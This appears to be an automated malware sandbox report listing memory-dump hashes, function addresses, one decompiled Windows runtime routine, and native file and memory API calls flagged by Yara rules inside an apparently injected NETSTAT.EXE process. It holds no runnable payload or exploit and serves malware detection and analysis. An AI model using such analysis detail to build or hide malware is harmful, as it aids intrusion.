                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 424f4f133fe453ac66af71338374aa6cb7abd6c8b4f389559a926cdab47b8979
                                            • Instruction ID: 5b45f96903b48efb9dc96b9fda9118729d0157ae8931af36ebf00e1b15ddb41e
                                            • Opcode Fuzzy Hash: 424f4f133fe453ac66af71338374aa6cb7abd6c8b4f389559a926cdab47b8979
                                            • Instruction Fuzzy Hash: 48B09B729014D5C5D711D76046087177D40F7D0741F56C5B5D1020645B4779C4D1F5F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00B098A0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e24d17fa15ebee1b9cae2f535f526d5c67b1429c41722d09215a5ea400e3b2bc
                                            • Instruction ID: a2e50309cd3cadd8a3bf4859dbfc26dd4e4c9a47eedcb7e189b63c7df1fcb2a3
                                            • Opcode Fuzzy Hash: e24d17fa15ebee1b9cae2f535f526d5c67b1429c41722d09215a5ea400e3b2bc
                                            • Instruction Fuzzy Hash: 0E90026230101402D202615944146460449D7D1385FD1C476E1414555D866589A3F1B2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09820, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e50ca5c4e548965b03b8c947a946f866ddd8ee46dc980b2d7864ea2ca6246c45
                                            • Instruction ID: fa02e4b9450797fe9d8e77c4ce02d3b66652960fff2c0f0876afa30d95273250
                                            • Opcode Fuzzy Hash: e50ca5c4e548965b03b8c947a946f866ddd8ee46dc980b2d7864ea2ca6246c45
                                            • Instruction Fuzzy Hash: B590027224101402D241715944046460449E7D0381FD1C476A0414554E86958AA6FAE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B0B040, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc0854f4b5264725ad837db5db2b74aa2f95e9e73bbc9731e190a12ab785f85b
                                            • Instruction ID: accb154d8253544cf63e707483da39228cf81b478c2de06ba1222b6d4bc0f015
                                            • Opcode Fuzzy Hash: dc0854f4b5264725ad837db5db2b74aa2f95e9e73bbc9731e190a12ab785f85b
                                            • Instruction Fuzzy Hash: F59002A2601150434640B15948044465455E7E13413D1C575A0444560C86A888A5E2E5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B095F0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6519beaa7bec0e35137959929f0aff715ec884e46a561a3611b3543b05226ff3
                                            • Instruction ID: 47d4e0aa66a4752e989f82937161c1cc59ed257e2d59c5e6864bd89cbee4727a
                                            • Opcode Fuzzy Hash: 6519beaa7bec0e35137959929f0aff715ec884e46a561a3611b3543b05226ff3
                                            • Instruction Fuzzy Hash: A290027220101802D204615948046C60445D7D0341F91C475A6014655E96A588E1B1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B099D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef6bdd4baf8242bbedacb5fb0238ca06018c4c0f8147f304fbf08e362c73972c
                                            • Instruction ID: d88c0b52c1423dcb7d9b341abb110593bca5ef367bd5b4b38c4201ebcfa302d6
                                            • Opcode Fuzzy Hash: ef6bdd4baf8242bbedacb5fb0238ca06018c4c0f8147f304fbf08e362c73972c
                                            • Instruction Fuzzy Hash: 489002A221101042D204615944047460485D7E1341F91C476A2144554CC5698CB1A1A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B0AD30, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f915d7f043f34a4457c9c7457aa47c42bdcc5c71836a3ab876f34dc25159c6f6
                                            • Instruction ID: e9eebd9da8ae578b1ec69760015d6c5f3dc0e6d2570cf4d86ff6e2c5b9cfe709
                                            • Opcode Fuzzy Hash: f915d7f043f34a4457c9c7457aa47c42bdcc5c71836a3ab876f34dc25159c6f6
                                            • Instruction Fuzzy Hash: 13900272A05010129240715948146864446E7E0781B95C475A0504554C89948AA5A3E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09520, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b0c83154196590341f3f1eac6ce3b780e5674f18b1024e6691bd868017e79fd
                                            • Instruction ID: 0b2e4f643b9b39f88c0eeb3512219f4b9432fd9b5554043a12fd6f73b9701c9f
                                            • Opcode Fuzzy Hash: 7b0c83154196590341f3f1eac6ce3b780e5674f18b1024e6691bd868017e79fd
                                            • Instruction Fuzzy Hash: 4B9002E2201150924600A2598404B4A4945D7E0341B91C47AE1044560CC56588A1E1B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09560, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9421b3401f4ce51a34ab7ae6f5a4b44770327564ced20a8c699845ad1ba6b77d
                                            • Instruction ID: af4d4d113696edd98e24e210076334d49af05d9953816f036e95e1d17ef6cd12
                                            • Opcode Fuzzy Hash: 9421b3401f4ce51a34ab7ae6f5a4b44770327564ced20a8c699845ad1ba6b77d
                                            • Instruction Fuzzy Hash: B2900266221010020245A559060454B0885E7D63913D1C479F1406590CC66188B5A3A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09950, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b09e0521caa82d64e561f27d1ddc184951e3855e9e6f38e3c0e948efa35fefbc
                                            • Instruction ID: b1144c3c5a5f6d668775f6faae3ffb8154da34781ecd974dcc8ac21bc74a674c
                                            • Opcode Fuzzy Hash: b09e0521caa82d64e561f27d1ddc184951e3855e9e6f38e3c0e948efa35fefbc
                                            • Instruction Fuzzy Hash: C99002A220141403D240655948046470445D7D0342F91C475A2054555E8A698CA1B1B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09A80, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f606a7f66f64d5233b9143ff5748d29331d4fd871089eb6f2cd4deed8e657a5
                                            • Instruction ID: 50a62bd72340fbffd67fc9f2b0f1cef86e0cef9a20bd3072f101950d4c9ebdbf
                                            • Opcode Fuzzy Hash: 9f606a7f66f64d5233b9143ff5748d29331d4fd871089eb6f2cd4deed8e657a5
                                            • Instruction Fuzzy Hash: 2390026220145442D24062594804B4F4545D7E1342FD1C47DA4146554CC95588A5A7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B096D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c172fc26384685a4c40eb21dbf427ba851b8fb8f26fce4ba6c6acbd85cfa6f7
                                            • Instruction ID: b412a08d0ccd3d4e5abb6d909a77bc14b54cb8e5f37b533282ecb8ff4e4999d3
                                            • Opcode Fuzzy Hash: 1c172fc26384685a4c40eb21dbf427ba851b8fb8f26fce4ba6c6acbd85cfa6f7
                                            • Instruction Fuzzy Hash: D690027220101842D20061594404B860445D7E0341F91C47AA0114654D8655C8A1B5A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09A10, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1355c4fee3b3943464493bf48ca54109f26a8784d69a1c6fda3558c184acb93
                                            • Instruction ID: 2f495bf66cb6576e0af4f1eb7db599bdeeff44ebc86d4f977c71d402508c3a89
                                            • Opcode Fuzzy Hash: a1355c4fee3b3943464493bf48ca54109f26a8784d69a1c6fda3558c184acb93
                                            • Instruction Fuzzy Hash: 6490027220141402D200615948087870445D7D0342F91C475A5154555E86A5C8E1B5B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09610, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08b16d99e88644bfdd040d1ee3e58075cd5720a4113050a36a6a814a5c3e3270
                                            • Instruction ID: 89b1177f4e313a5f0362f88c9822609f928e6d98c2c2125a5e0b454ad9083269
                                            • Opcode Fuzzy Hash: 08b16d99e88644bfdd040d1ee3e58075cd5720a4113050a36a6a814a5c3e3270
                                            • Instruction Fuzzy Hash: BC90027260501802D250715944147860445D7D0341F91C475A0014654D87958AA5B6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09650, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c96c21902df7f2aefc09cb8606ad8bf8bb2b1da3ea5a164596c830e461abc27c
                                            • Instruction ID: a774daa84d2d5c597f6ced90fa79d30c9f746bc18ca78267b8d703d66434be7b
                                            • Opcode Fuzzy Hash: c96c21902df7f2aefc09cb8606ad8bf8bb2b1da3ea5a164596c830e461abc27c
                                            • Instruction Fuzzy Hash: AB90027220505842D24071594404A860455D7D0345F91C475A0054694D96658DA5F6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B0A3B0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da89074fccd742c91022c869f9799d25c29e570f01dd33919bea5f7c2f1ea3b5
                                            • Instruction ID: a0bb50b380339f8f252cd8e8b62646d93137ee9812ed426c8edb890c242f24e5
                                            • Opcode Fuzzy Hash: da89074fccd742c91022c869f9799d25c29e570f01dd33919bea5f7c2f1ea3b5
                                            • Instruction Fuzzy Hash: 9390027220145002D2407159844464B5445E7E0341F91C875E0415554C865588A6E2A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09FE0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5827b1735f348fe138de006f8b2a3e432374df33c76ad6262f4221309c3ae9f
                                            • Instruction ID: 189484e989f2f9f0dc86189e3b71d9647c3315315c8a2ef0530263dcd512f25a
                                            • Opcode Fuzzy Hash: d5827b1735f348fe138de006f8b2a3e432374df33c76ad6262f4221309c3ae9f
                                            • Instruction Fuzzy Hash: FD90027231115402D210615984047460445D7D1341F91C875A0814558D86D588E1B1A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09730, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e7f7b48162b5fa08d0ec81cec581fadc6880f56075becf05c2042e48903a748
                                            • Instruction ID: c3c31bed3396c4fc4d5b04fcc14a8525275a81b1e4bcadca9be8124073970acc
                                            • Opcode Fuzzy Hash: 0e7f7b48162b5fa08d0ec81cec581fadc6880f56075becf05c2042e48903a748
                                            • Instruction Fuzzy Hash: C990026260501402D240715954187460455D7D0341F91D475A0014554DC6998AA5B6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B0A710, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd28aba6a436024b0a542c67e6a5f2ed2662c2d21e164da69e7fa955b9905c9a
                                            • Instruction ID: e6a5b6b9ce996b423916bef998d048ee347981712a716b15e2c81d74127f1721
                                            • Opcode Fuzzy Hash: cd28aba6a436024b0a542c67e6a5f2ed2662c2d21e164da69e7fa955b9905c9a
                                            • Instruction Fuzzy Hash: CD900272301010529600A6995804A8A4545D7F0341B91D479A4004554C859488B1A1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09B00, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db99d7a7ab664e2d084c34723965383777cb44fa90bff63f408e286da05fa4f7
                                            • Instruction ID: 041a37c7faed1129cc83380020243d78a3dd915981650935fb47686b11850987
                                            • Opcode Fuzzy Hash: db99d7a7ab664e2d084c34723965383777cb44fa90bff63f408e286da05fa4f7
                                            • Instruction Fuzzy Hash: 9090026224101802D240715984147470446D7D0741F91C475A0014554D865689B5B6F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09770, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 99a053d2e65f5b7446defb8fa4d797240a91fab96db378e8c7fb28a9962216c8
                                            • Instruction ID: 8832449582f44719eaee5cbfca9d576bdfa9e8133f986077c2e76fbd8ddad941
                                            • Opcode Fuzzy Hash: 99a053d2e65f5b7446defb8fa4d797240a91fab96db378e8c7fb28a9962216c8
                                            • Instruction Fuzzy Hash: F590026220505442D20065595408A460445D7D0345F91D475A1054595DC67588A1F1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B0A770, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e40b746202e91ee5e79100ea14744c8c4c4ad33b8efa584cbc8c6ed69726a8d4
                                            • Instruction ID: f3a446674b5e0c6da0ac0997277c0c0ece3617cbb04e05312a04d3426238957d
                                            • Opcode Fuzzy Hash: e40b746202e91ee5e79100ea14744c8c4c4ad33b8efa584cbc8c6ed69726a8d4
                                            • Instruction Fuzzy Hash: AA90027620505442D60065595804AC70445D7D0345F91D875A041459CD869488B1F1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09760, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e532a8790034a232e59d2a839dcf0bc7116f4e19fa4b3119f2e99855162698a
                                            • Instruction ID: 752a1518a374576664543b0354e19c0bb0b925c3a808b5c7ca56c2bb1f0cdf8f
                                            • Opcode Fuzzy Hash: 4e532a8790034a232e59d2a839dcf0bc7116f4e19fa4b3119f2e99855162698a
                                            • Instruction Fuzzy Hash: CB90027220101403D200615955087470445D7D0341F91D875A0414558DD69688A1B1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09670, Relevance: .0, Instructions: 2COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 0eb7217eeab8ceb392ce0bbe0836a645f42d82d03ba5b37ccf2dcdb9b08a70f7
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E00B5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00B0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x00b5fdda
                                            0x00b5fde2
                                            0x00b5fde5
                                            0x00b5fdec
                                            0x00b5fdfa
                                            0x00b5fdff
                                            0x00b5fe0a
                                            0x00b5fe0f
                                            0x00b5fe17
                                            0x00b5fe1e
                                            0x00b5fe19
                                            0x00b5fe19
                                            0x00b5fe19
                                            0x00b5fe20
                                            0x00b5fe21
                                            0x00b5fe22
                                            0x00b5fe25
                                            0x00b5fe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B5FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B5FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B5FE2B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: abd9ce0a43d0b17b4f4011faeacd6cbb7c2f24d875385e7d5430a44307b010f8
                                            • Instruction ID: f36cca451547e70f60d32bbd753c75d5c88285f8e5e1e823eae1a6e2e1af88bb
                                            • Opcode Fuzzy Hash: abd9ce0a43d0b17b4f4011faeacd6cbb7c2f24d875385e7d5430a44307b010f8
                                            • Instruction Fuzzy Hash: 8EF0F632200601BFD6201A45DC03F73BF9AEB44731F240395FA28561E2DA62FC6097F0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: NETSTAT.EXE PID: 5752 Parent PID: 3424 NETSTAT.EXECOMMON

                                            Executed Functions

                                            Function 02DD9D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02DD4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02DD9DAD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 6f7c1f125a4f6b05b8b3e8613dd503a37bdb7517ab6c9ddbba2e95545b684a44
                                            • Instruction ID: c91d306056b64b0bbf90dc24438737cc5f24d7e608ced4d8d7d4f601e2bcaa71
                                            • Opcode Fuzzy Hash: 6f7c1f125a4f6b05b8b3e8613dd503a37bdb7517ab6c9ddbba2e95545b684a44
                                            • Instruction Fuzzy Hash: 9F01ECB2205508BBDB08CF88CC95EDB77ADEF8D714F158688FA4D97241D631E811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DD9D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02DD4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02DD9DAD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: 8f9760be115cb64be38372f0880f62653af10ec7c94b934cece31a3d8ae3ce70
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: 3FF0B2B2200208ABCB08CF88DC84EEB77ADEF8C754F158248FA0D97240C630E8118BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DD9E0A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(02DD4D42,5EB6522D,FFFFFFFF,02DD4A01,?,?,02DD4D42,?,02DD4A01,FFFFFFFF,5EB6522D,02DD4D42,?,00000000), ref: 02DD9E55
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 293bb9453cdb17cad94378a919b07c1d5b417ee36a18e2c385878743a02a47a0
                                            • Instruction ID: b459d61fabd74773452d7315a38a64a965e97f6e0f12f98f758b5be21046abad
                                            • Opcode Fuzzy Hash: 293bb9453cdb17cad94378a919b07c1d5b417ee36a18e2c385878743a02a47a0
                                            • Instruction Fuzzy Hash: AAF0E7B6200108ABDB04DF99DC80DEB77A9FF8C354F058248FA0D97255D630E8118BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DD9E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(02DD4D42,5EB6522D,FFFFFFFF,02DD4A01,?,?,02DD4D42,?,02DD4A01,FFFFFFFF,5EB6522D,02DD4D42,?,00000000), ref: 02DD9E55
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: 1a704770b79162fa352cc915d1e135c67b4484acfa6911aac8e9a75d4ca77a7c
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: 29F0A4B2200208ABCB14DF89DC80EEB77ADEF8C754F158248FA1DA7241D630E8118BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DD9F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02DC2D11,00002000,00003000,00000004), ref: 02DD9F79
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: de28dbfdc727b52fd6c47a58003ae319aa0878182854bd76046c915066b6e784
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: FBF015B2200208ABCB14DF89CC80EAB77ADEF88750F158148FE08A7241C630F810CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DD9F3A, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02DC2D11,00002000,00003000,00000004), ref: 02DD9F79
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 971a1df24cf7771ce165f7dde8c4d715c67a8d1c81f39a90d420e26e17c94d42
                                            • Instruction ID: b12c3385797503edf47f985e8ded8cc6012c11be1d469176ae004bf0234ae86e
                                            • Opcode Fuzzy Hash: 971a1df24cf7771ce165f7dde8c4d715c67a8d1c81f39a90d420e26e17c94d42
                                            • Instruction Fuzzy Hash: 49F08CB1100149ABCB14EF68DC80CA7BBA9FF88210B05864DFD98A7202C230E825CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DD9E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(02DD4D20,?,?,02DD4D20,00000000,FFFFFFFF), ref: 02DD9EB5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
